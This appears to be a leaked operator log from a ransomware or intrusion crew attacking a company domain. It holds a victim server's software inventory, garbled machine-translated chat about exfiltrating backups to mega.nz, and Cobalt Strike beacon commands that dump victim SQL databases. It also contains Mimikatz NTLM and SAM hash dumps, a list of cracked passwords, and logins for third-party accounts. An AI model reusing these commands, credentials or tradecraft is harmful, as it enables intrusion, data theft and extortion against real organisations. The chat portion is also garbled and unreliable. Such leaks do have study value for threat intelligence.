  Publisher : Ebisoft Solutions Inc.
  InstallDate : 3/10/2015 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.20.27508
  DisplayVersion : 14.20.27508.1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : SEI OLAP For SQL Server - Setup
  DisplayVersion : 7.0.0
  Publisher : Ebisoft Solutions Inc.
  InstallDate : 3/10/2015 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2005 Redistributable
  DisplayVersion : 8.0.59193
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.20.27508
  DisplayVersion : 14.20.27508.1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Office 2003 Web Components
  DisplayVersion : 12.0.6213.1000
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
  DisplayVersion : 9.0.30729.6161
  Publisher : Microsoft Corporation
  InstallDate : 1/26/2019 12:00:00 AM
  Architecture : x86

  DisplayName : HP Array Configuration Utility
  DisplayVersion : 8.70.9.0
  Publisher : Hewlett Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.20.27508
  DisplayVersion : 14.20.27508
  Publisher : Microsoft Corporation
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual Studio 2008 Shell (integrated mode) - ENU
  DisplayVersion : 9.0.30729
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server Browser
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2019 X86 Additional Runtime - 14.20.27508
  DisplayVersion : 14.20.27508
  Publisher : Microsoft Corporation
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Report Viewer Redistributable 2008 (KB971119)
  DisplayVersion : 9.0.30731
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server 2008 R2 Policies
  DisplayVersion : 10.50.1600.1
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Sage X3 Base Sql Server V6
  DisplayVersion : 6.00.0000
  Publisher : Sage
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : VMware vCenter Converter Standalone
  DisplayVersion : 6.2.0.8466193
  Publisher : VMware, Inc.
  InstallDate : 1/26/2019 12:00:00 AM
  Architecture : x86

  DisplayName : Sage X3 Base Sql Server V6 X3V6
  DisplayVersion :
  Publisher :
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server Compact 3.5 SP2 Query Tools ENU
  DisplayVersion : 3.5.8080.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : HP Array Configuration Utility CLI
  DisplayVersion : 8.70.8.0
  Publisher : Hewlett-Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86



  DisplayName : ATI Display Driver
  DisplayVersion : 8.24.50.5-090623a-083726C-HP
  Publisher :
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Barracuda Backup Agent
  DisplayVersion : 6.5.00-300019-rel
  Publisher : Barracuda Networks, Inc.
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Service Pack 1 for SQL Server 2008 R2 (KB2528583) (64-bit)
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft .NET Framework 4 Client Profile
  DisplayVersion : 4.0.30319
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft .NET Framework 4 Extended
  DisplayVersion : 4.0.30319
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 (64-bit)
  DisplayVersion :
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 (64-bit)
  DisplayVersion :
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 Setup (English)
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2005 Redistributable (x64)
  DisplayVersion : 8.0.56336
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 Reporting Services
  DisplayVersion : 10.50.1600.1
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 BI Development Studio
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Common Files
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Reporting Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : VMware Tools
  DisplayVersion : 11.0.5.15389592
  Publisher : VMware, Inc.
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server VSS Writer
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Client Tools
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 BI Development Studio
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Common Files
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server System CLR Types (x64)
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 Native Client
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2019 X64 Additional Runtime - 14.20.27508
  DisplayVersion : 14.20.27508
  Publisher : Microsoft Corporation
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Management Studio
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Sync Framework Runtime v1.0 (x64)
  DisplayVersion : 1.0.1215.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
  DisplayVersion : 9.0.30729.6161
  Publisher : Microsoft Corporation
  InstallDate : 1/26/2019 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2005 Redistributable (x64)
  DisplayVersion : 8.0.59192
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Analysis Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Management Studio
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : HP Lights-Out Online Configuration Utility
  DisplayVersion : 3.1.1.0
  Publisher : Hewlett-Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : HP ProLiant Remote Monitor Service
  DisplayVersion : 5.21.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Integration Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Sync Services for ADO.NET v2.0 (x64)
  DisplayVersion : 2.0.1215.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft .NET Framework 4 Extended
  DisplayVersion : 4.0.30319
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Application Error Reporting
  DisplayVersion : 12.0.6015.5000
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Full text search
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Symantec Endpoint Protection
  DisplayVersion : 14.2.1031.0100
  Publisher : Symantec Corporation
  InstallDate : 4/2/2019 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Database Engine Shared
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Integration Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 Setup Support Files
  DisplayVersion : 10.1.2731.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Client Tools
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Database Engine Shared
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 RsFx Driver
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : HP Insight Diagnostics Online Edition for Windows
  DisplayVersion : 8.7.0
  Publisher : Hewlett-Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : HP Smart Array SAS/SATA Event Notification Service
  DisplayVersion : 6.24.0.64
  Publisher : Hewlett-Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Analysis Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : HP Insight Management Agents
  DisplayVersion : 8.70.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Sql Server Customer Experience Improvement Program
  DisplayVersion : 10.50.1600.1
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.20.27508
  DisplayVersion : 14.20.27508
  Publisher : Microsoft Corporation
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft .NET Framework 4 Client Profile
  DisplayVersion : 4.0.30319
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Database Engine Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Database Engine Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : HP ProLiant Integrated Management Log Viewer
  DisplayVersion : 5.25.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64





[*] Completed collection in 0.053 seconds
``about asus-order[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=GPiNRPxiW29QHPLoH) and why in the water a few external clauses? Backup only from a box in the domain alono it hangs out in all trusts there is only 15 mb true one DA pumped out financial directors did not get out mail as their boxes externalBackups bore from `SQLPROD1.rtpco.local''
```
https://mega.nz/file/SZ1WASAL#MqS9puEoLsGzGYQgsFbGqzuq6gE2u1KEAb-c8FwE9Jc
``...and here's this miracle for 26 bucks/1 tb`` like `guys, put a bunch of eh....`` is there any point from asus at all to look for creeds? are we closing or not? @tl1[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=y3oEn9wde85qxurgv) ok, now close in an hour and a half )We need to order marbled beef steaksI don't understand the definition of gjqve today until 12 october with this we're sitting in the middle of everything and everything[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=SNimBdBH9fmNrRehJ)=on that skul server where we just backed up+ where did you see this? https://storeasuswebstorage.com/personal/ransomware_deleteon this stuff found? https://www.file.net/process/backupservice.exe.htmlони just cut off the external and in the course of the local everything will stand up the second backup moved to another server? I understand the sesurity event began lol) shut down start what? start as is? it directly in the temporary was unarchived in general this shit is a priority folder left?hmmm let's close today it's better not to postpone it will be looking at this now a lot of activity do you think? just on the first i haven't even filled the mega yet and transfer it to another server razloginpostri there megapost when you try to unload it not touched and even the archive is pinged first returned from the asus found accesses?
now not pinged respawn, respawn, failed failed failedloginya startuiluvayu meguna on one server all zaharchivala takavrode no that noise at the post office they were not?))) so it tech and picked up passwords - 453 things) and mail and tech? passwords puncher for several hours6 not configured, 4 just the creeds do not fit all unconfigured?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=3RnxsDkK4JCf8cEtc) with esx is not good out of 31 alive to 10 there is no creds i have not dealt with it, i decided to do it the familiar wayrcloneconsole version of what? what about the console version? i did not risk rclonomarchives backups how are you doing?
shell sqlcmd -S 10.89.11.15,1433 -E -Q "BACKUP DATABASE [Remote Desktop Services] TO DISK='D:\temporary\Remote_Desktop_Services.bak'"
``that's all the escaping and the file path can be written together or with _in the skul syntax to refer to such a thing should be written in []escaping incorrectlykakoy prankche patsy escaping
```
beacon> shell sqlcmd -S 10.89.11.15,1433 -E -Q "BACKUP DATABASE 'Remote Desktop Services' TO DISK='D:\temporary\Remote Desktop Services.bak'"
[*] Tasked beacon to run: sqlcmd -S 10.89.11.15,1433 -E -Q "BACKUP DATABASE 'Remote Desktop Services' TO DISK=D:\temporary\'Remote Desktop Services.bak'"
[+] host called home, sent: 158 bytes
[+] received output:
Msg 102, Level 15, State 1, Server AXSQL-PROD, Line 1
Incorrect syntax near 'Remote Desktop Services'.
``I don't think it's 6 left there I looked in the wrong place was lying there is 25 gb space left 40 gb will be compressed in 7z to 24? all at once unload it can be unloaded at once to the megaOnBaseTextodone DB was leftasand you have already backed up a few? I mean, do not touch their files, but that's for sure, and then just add a new one to them, so maybe it's better to archive these backups, you can add a third party drive, first delete the old backup to make room for it, even better) leave the new ones, maybe delete the old ones, one was not enough to back up, the space ran out, I've noticed for a long time that the inject crashes them, or something crashed them, but the old ones went out...on the other server I need the process sqlwriter/ѕqqlestrv when I look in the process sheet or what do you want? you want to get a list of processes no? eh no it's not right do it without a token
wmic proc... call create "cmd /c sqlwriter.exe"
i got it right? what difference does it make to get the list of processes from what context? within the localhostanetak it inmikom with a different context their dastmik requested at one of the first where i tried to check everything returned at the other server processes are not returned)) i reseeded and steal token = 0) vestmocontext change as done?
BACKUP DATABASE successfully processed 370 pages in 0.132 seconds (21.843 MB/sec).

``Eesdohlasha try it, don't inject it, try steal token from processa by the way``.
	 * Username : SqlService$
	 * Domain : RTPCO
	 * NTLM : b571730c862f68e2bb2e39b632d888a4
 
	 * Username : AXSQL-PROD$
	 * Domain : RTPCO
	 * NTLM : 35d143f9410ec2a3a917c0e5a55240c8
 
	 * Username : SqlIntService$
	 * Domain : RTPCO
	 * NTLM : b571730c862f68e2bb2e39b632d888a4
 
	 * Username : AxAdmin
	 * Domain : RTPCO
	 * NTLM : 75f5262bc7f6aa12fe8cbeaf23f12d77
 
	 * Username : bstangea
	 * Domain : RTPCO
	 * NTLM : f13d2f88fdf2a0970db1ece9ce90bc57
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2bd07805e537f32fe65cdb7ec1ac64c6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1514a4ea314bd98b5649235b5131f403:::
```
 
```
	 * Username : SQLPROD1$
	 * Domain : rtpco
	 * NTLM : 5ee9d4286dfdba4dc96238d60c9d9225
 
	 * Username : SqlAgentService$
	 * Domain : RTPCO
	 * NTLM : b571730c862f68e2bb2e39b632d888a4
 
	 * Username : SqlService$
	 * Domain : RTPCO
	 * NTLM : b571730c862f68e2bb2e39b632d888a4
 
	 * Username : bstangea
	 * Domain : RTPCO
	 * NTLM : f13d2f88fdf2a0970db1ece9ce90bc57
 
	 * Username : wimansql
	 * Domain : rtpco
	 * NTLM : f5ff86c22606f7b57313f605cebe340f
 
	 * Username : jleadmin
	 * Domain : RTPCO
	 * NTLM : 7807f70fc7ebd9fc858c40dc4a3f68dd
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2bd07805e537f32fe65cdb7ec1ac64c6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
``dump the crudes from the whine''.
beacon> shell sqlcmd -S 10.89.0.99,1433 -E -Q "BACKUP DATABASE KLCAuditReporting TO DISK='D:\temporary\KLCAuditReporting.bak'"
[*] Tasked beacon to run: sqlcmd -S 10.89.0.99,1433 -E -Q "BACKUP DATABASE KLCAuditReporting TO DISK='D:\temporary\KLCAuditReporting.bak'"
[+] host called home, sent: 143 bytes
[+] received output:
Msg 916, Level 14, State 1, Server SQLPROD1, Line 1
The server principal "NT AUTHORITY\SYSTEM" is unable to access the database "KLCAuditReporting" under the current security context.
Msg 3013, Level 16, State 1, Server SQLPROD1, Line 1
BACKUP DATABASE is terminating abnormally.

``Peak from winlogon does not work? chop pai pomi https after a while it restores it and that's all not injected into the process is like that_model _temp similarlySolartWinds fuck it - no need it perfect timing two servers *backup two ddts said two? does not look like two) a hundredth of it gets`SQLPROD1``
```
OnBaseTest
ksubscribers
kapps
KLCAuditReporting
OnBase
```
 
 ``AXSQL-PROD
```
AX2012_PROD
ProductVision_Live
ReportServer_AxLive
Remote Desktop Services
The system is not at all? take it out of the product database or it is not injected without explanations I do an inject - the process is extinguished but the processes are there[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=J7NX33FW8tXv2FFus) but how else do I know that there is an active scull spinning?but to watch everything and from winlogon worked just do not inject into them and do the processes need to be in the skuli that pulltl2 said there is a lot of trash, throw these shortly or tell me what's the matter trash from them cleaned the same readable i threw themtl2 asked to look tables certain there kilometer messages i threw lists of databases from all servers read backup?so what about the databases? just on them, and 4 more - the creeds did not come up only used in emergencies 6 pieces such as incorrectly configured ip, name, etc., right ... and what about it? says the wrong log or passa about esx i threw a picture there. what do you think?
88781646e2a2399370c54bae7f790e58 @d0nix
7259ade8efc785abb4043e171e06b9c6 300SpartanS
b4712f346339be917d4d9fe2ce3c387c barracuda
5acd3ae4a25e042cb01513ea9104b598 Barracuda
f97f8542534b19414d871e197d222747 Gutch@!!
960736ab56cfa8943d4de07ef142a730 boston
ae8e27dc85a2682037008ebe671655f0 afdljplw
b6c367027c0d73a755244ad52bda9a67 !nC0rr3ct
6c77565149af62e68bb41868d29ec47a d0n3g0n3
e9b57eb8af25befb91bda9b4ed95097c 11Saundra
a99a74eb78fc1f1ea3a89b53b7de7179 p@perm00n
b4712f346339be917d4d9fe2ce3c387c barracuda
4df7f5cc8377559b058c30516ca88a30 sub@sh2005
652805d304727fa73d6c4c7cfef31986 Calib3r9
5f6e5864d8622c481a233d9472f1b3a8 Gahann@

``Yeah, apparently it ran out of money...here it is нормjeremstew@gmx.com
1Qwerty1

you can also try this one if the previous "not ok" was not availablea long time ago with the password qwerthttps://cmg5.org
j.shoemaker@australiamail.com
1qwerty1

try it for a minute) davaltfu fuckin' davaille like davalt@tl2 and can we have the account on cmd5 - otherwise wait every time...``
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use InsightEnt; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use InsightEnt; exec sp_tables" -W
[+] host called home, sent: 98 bytes
[+] received output:
Changed database context to 'InsightEnt'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
InsightEnt dbo AuditTrail TABLE NULL
InsightEnt dbo Bookmarks TABLE NULL
InsightEnt dbo Cameras TABLE NULL
InsightEnt dbo CameraTemplates TABLE NULL
InsightEnt dbo CameraZones TABLE NULL
InsightEnt dbo ClientTask TABLE NULL
InsightEnt dbo ClientTaskQueue TABLE NULL
InsightEnt dbo ClientTaskReport TABLE NULL
InsightEnt dbo ContactInformation TABLE NULL
InsightEnt dbo Door TABLE NULL
InsightEnt dbo EventText TABLE NULL
InsightEnt dbo ExtendedProperties TABLE NULL
InsightEnt dbo FailOverControl TABLE NULL
InsightEnt dbo FM_FacilityMap TABLE NULL
InsightEnt dbo FM_FacilityMapItems TABLE NULL
InsightEnt dbo Layout TABLE NULL
InsightEnt dbo LayoutGroups TABLE NULL
InsightEnt dbo LayoutMapping TABLE NULL
InsightEnt dbo LicensePlateEvents TABLE NULL
InsightEnt dbo LicensePlateGroup TABLE NULL
InsightEnt dbo LicensePlateGrouping TABLE NULL
InsightEnt dbo LicensePlateMapping TABLE NULL
InsightEnt dbo LicensePlates TABLE NULL
InsightEnt dbo LiveView TABLE NULL
InsightEnt dbo Locations TABLE NULL
InsightEnt dbo NetworkDecoder TABLE NULL
InsightEnt dbo NVRs TABLE NULL
InsightEnt dbo PlugIn TABLE NULL
InsightEnt dbo PluginSettings TABLE NULL
InsightEnt dbo PTZCycle TABLE NULL
InsightEnt dbo PTZPriority TABLE NULL
InsightEnt dbo ResourceGroups TABLE NULL
InsightEnt dbo ResourceMapping TABLE NULL
InsightEnt dbo Servers TABLE NULL
InsightEnt dbo ServerStorage TABLE NULL
InsightEnt dbo System_Log TABLE NULL
InsightEnt dbo TaskAction TABLE NULL
InsightEnt dbo TaskCondition TABLE NULL
InsightEnt dbo TaskSchedule TABLE NULL
InsightEnt dbo UM_CustomerCamera TABLE NULL
InsightEnt dbo UM_Customers TABLE NULL
InsightEnt dbo UM_Groups TABLE NULL
InsightEnt dbo UM_Permissions TABLE NULL
InsightEnt dbo UM_UDefRes_Permissions TABLE NULL
InsightEnt dbo UM_UserAssignment TABLE NULL
InsightEnt dbo UM_Users TABLE NULL
InsightEnt dbo VCASettings TABLE NULL
InsightEnt dbo Version TABLE NULL
InsightEnt dbo VideoFiles TABLE NULL
InsightEnt dbo VideoFilesLog TABLE NULL
InsightEnt dbo VideoWall TABLE NULL
InsightEnt dbo VideoWallConfig TABLE NULL
InsightEnt dbo VideoWallMonitor TABLE NULL
InsightEnt dbo VideoWallRoaming TABLE NULL
InsightEnt dbo VITask TABLE NULL
InsightEnt dbo WA_Location TABLE NULL
InsightEnt dbo WA_Location_Server TABLE NULL
InsightEnt INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
InsightEnt INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
InsightEnt INFORMATION_SCHEMA COLUMNS VIEW NULL
InsightEnt INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
InsightEnt INFORMATION_SCHEMA DOMAINS VIEW NULL
InsightEnt INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA PARAMETERS VIEW NULL
InsightEnt INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
InsightEnt INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
InsightEnt INFORMATION_SCHEMA ROUTINES VIEW NULL
InsightEnt INFORMATION_SCHEMA SCHEMATA VIEW NULL
InsightEnt INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
InsightEnt INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
InsightEnt INFORMATION_SCHEMA TABLES VIEW NULL
InsightEnt INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA VIEWS VIEW NULL
InsightEnt sys all_columns VIEW NULL
InsightEnt sys all_objects VIEW NULL
InsightEnt sys all_parameters VIEW NULL
InsightEnt sys all_sql_modules VIEW NULL
InsightEnt sys all_views VIEW NULL
InsightEnt sys allocation_units VIEW NULL
InsightEnt sys assemblies VIEW NULL
InsightEnt sys assembly_files VIEW NULL
InsightEnt sys assembly_modules VIEW NULL
InsightEnt sys assembly_references VIEW NULL
InsightEnt sys assembly_types VIEW NULL
InsightEnt sys asymmetric_keys VIEW NULL
InsightEnt sys backup_devices VIEW NULL
InsightEnt sys certificates VIEW NULL
InsightEnt sys change_tracking_databases VIEW NULL
InsightEnt sys change_tracking_tables VIEW NULL
InsightEnt sys check_constraints VIEW NULL
InsightEnt sys column_type_usages VIEW NULL
InsightEnt sys column_xml_schema_collection_usages VIEW NULL
InsightEnt sys columns VIEW NULL
InsightEnt sys computed_columns VIEW NULL
InsightEnt sys configurations VIEW NULL
InsightEnt sys conversation_endpoints VIEW NULL
InsightEnt sys conversation_groups VIEW NULL
InsightEnt sys conversation_priorities VIEW NULL
InsightEnt sys credentials VIEW NULL
InsightEnt sys crypt_properties VIEW NULL
InsightEnt sys cryptographic_providers VIEW NULL
InsightEnt sys data_spaces VIEW NULL
InsightEnt sys database_audit_specification_details VIEW NULL
InsightEnt sys database_audit_specifications VIEW NULL
InsightEnt sys database_files VIEW NULL
InsightEnt sys database_mirroring VIEW NULL
InsightEnt sys database_mirroring_endpoints VIEW NULL
InsightEnt sys database_mirroring_witnesses VIEW NULL
InsightEnt sys database_permissions VIEW NULL
InsightEnt sys database_principal_aliases VIEW NULL
InsightEnt sys database_principal_aliases VIEW NULL
InsightEnt sys database_recovery_status VIEW NULL
InsightEnt sys database_role_members VIEW NULL
InsightEnt sys databases VIEW NULL
InsightEnt sys default_constraints VIEW NULL
InsightEnt sys destination_data_spaces VIEW NULL
InsightEnt sys dm_audit_actions VIEW NULL
InsightEnt sys dm_audit_class_type_map VIEW NULL
InsightEnt sys dm_broker_activated_tasks VIEW NULL
InsightEnt sys dm_broker_connections VIEW NULL
InsightEnt sys dm_broker_forwarded_messages VIEW NULL
InsightEnt sys dm_broker_queue_monitors VIEW NULL
InsightEnt sys dm_cdc_errors VIEW NULL
InsightEnt sys dm_cdc_log_scan_sessions VIEW NULL
InsightEnt sys dm_clr_appdomains VIEW NULL
InsightEnt sys dm_clr_loaded_assemblies VIEW NULL
InsightEnt sys dm_clr_properties VIEW NULL
InsightEnt sys dm_clr_tasks VIEW NULL
InsightEnt sys dm_cryptographic_provider_properties VIEW NULL
InsightEnt sys dm_database_encryption_keys VIEW NULL
InsightEnt sys dm_db_file_space_usage VIEW NULL
InsightEnt sys dm_db_index_usage_stats VIEW NULL
InsightEnt sys dm_db_mirroring_auto_page_repair VIEW NULL
InsightEnt sys dm_db_mirroring_connections VIEW NULL
InsightEnt sys dm_db_mirroring_past_actions VIEW NULL
InsightEnt sys dm_db_missing_index_details VIEW NULL
InsightEnt sys dm_db_missing_index_group_stats VIEW NULL
InsightEnt sys dm_db_missing_index_groups VIEW NULL
InsightEnt sys dm_db_partition_stats VIEW NULL
InsightEnt sys dm_db_persisted_sku_features VIEW NULL
InsightEnt sys dm_db_script_level VIEW NULL
